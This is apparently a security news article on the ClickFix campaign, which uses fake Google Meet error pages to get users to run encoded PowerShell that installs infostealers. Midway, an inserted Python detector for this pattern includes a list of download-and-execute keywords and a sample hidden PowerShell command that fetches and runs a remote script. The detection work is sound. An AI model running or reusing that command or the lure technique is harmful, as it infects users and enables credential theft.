Threat actors are leveraging fake Google Meet web pages as part of an ongoing malware campaign dubbed ClickFix to deliver infostealers targeting Windows and macOS systems.
“This tactic involves displaying fake error messages in web browsers to deceive users into copying and executing a given malicious PowerShell code, finally infecting their systems,” French cybersecurity company Sekoia said in a report shared with The Hacker News.
Variations of the ClickFix (aka ClearFake and OneDrive Pastejacking) campaign have been reported extensively in recent months, with threat actors employing different lures to redirect users to bogus pages that aim to deploy malware by urging site visitors to run an encoded PowerShell command to address a supposed issue with displaying content in the web browser.
These pages are known to masquerade as popular online services, including Facebook, Google Chrome, PDFSimpli, and reCAPTCHA, and now Google Meet as well as potentially Zoom.
On Windows, the attack chain culminates in the deployment of the StealC and Rhadamanthys stealers, while Apple macOS users are served a booby-trapped disk image file (“Launcher_v1.94.dmg”) that drops another stealer known as Atomic.
This emerging social engineering tactic is notable for the fact that it cleverly evades detection by security tools: the user manually runs the malicious PowerShell command directly in a terminal, rather than the command being invoked automatically by a payload that the user downloaded and executed.
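As an added illustration (not code from Sekoia's report or the article), the following Python detection logic runs over constructed Sysmon-style process-creation events and flags the ClickFix execution pattern described above: PowerShell launched by the user from the Run dialog (parent explorer.exe) with an -EncodedCommand argument that decodes to a download-and-execute one-liner. The field names, keyword list and sample events are assumptions made for this example.

```python
import base64
import re

# Matches -e / -ec / -en / -enc / -EncodedCommand followed by a base64 blob.
ENC_RE = re.compile(r"\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# Keywords typical of a download-and-execute one-liner (assumed indicator set).
SUSPICIOUS = ("iex", "invoke-expression", "downloadstring", "net.webclient",
              "invoke-webrequest", "iwr", "irm", "frombase64string")
USER_LAUNCH_PARENTS = ("explorer.exe",)  # Win+R Run dialog commands spawn from explorer.exe

def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENC_RE.search(" " + command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le", "ignore")
    except ValueError:
        return None

def analyze_event(event):
    """Flag one Sysmon-style process-creation event matching the ClickFix pattern."""
    image = event["Image"].lower().rsplit("\\", 1)[-1]
    parent = event["ParentImage"].lower().rsplit("\\", 1)[-1]
    if image not in ("powershell.exe", "pwsh.exe") or parent not in USER_LAUNCH_PARENTS:
        return None
    decoded = decode_encoded_command(event["CommandLine"])
    if decoded is None:
        return None
    hits = [k for k in SUSPICIOUS if k in decoded.lower()]
    return {"parent": parent, "decoded": decoded, "indicators": hits} if hits else None

def scan(events):  # run the detector over a batch of events and return the findings
    return [f for f in (analyze_event(e) for e in events) if f]

def _enc(ps):  # builds a realistic -enc argument for the constructed samples
    return base64.b64encode(ps.encode("utf-16le")).decode()

PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed sample telemetry, not real campaign data
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS_PATH,
     "CommandLine": "powershell.exe -w hidden -ep bypass -enc "
     + _enc('IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/x.ps1")')},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS_PATH,
     "CommandLine": "powershell.exe -NoProfile -Command Get-Date"},  # user-launched, benign
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS_PATH,
     "CommandLine": "powershell.exe -enc " + _enc("Get-ChildItem C:\\Temp")},  # scripted
]
```

Only the first sample is flagged: the benign interactive command carries no encoded payload, and the encoded command spawned by cmd.exe lacks the user-launch parent, so the decoded content is never scored.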
Sekoia has attributed the cluster impersonating Google Meet to two traffers groups, namely Slavic Nation Empire (aka Slavice Nation Land) and Scamquerteo, which are sub-teams within markopolo and CryptoLove, respectively.
“Both traffers teams […] use the same ClickFix template that impersonates Google Meet,” Sekoia said. “This discovery suggests that these teams share materials, also known as ‘landing project,’ as well as infrastructure.”
This, in turn, has raised the possibility that both threat groups are using the same, as-yet-unknown cybercrime service, with a third party likely managing their infrastructure.
The development comes amid the emergence of malware campaigns distributing the open-source ThunderKitty stealer, which shares overlaps with Skuld and Kematian Stealer, as well as new stealer families named Divulge, DedSec (aka Doenerium), Duck, Vilsa, and Yunit.
“The rise of open-source infostealers represents a significant shift in the world of cyber threats,” cybersecurity company Hudson Rock noted back in July 2024.
“By lowering the barrier of entry and fostering rapid innovation, these tools could fuel a new wave of computer infections, posing challenges for cybersecurity professionals and increasing the overall risk to businesses and individuals.”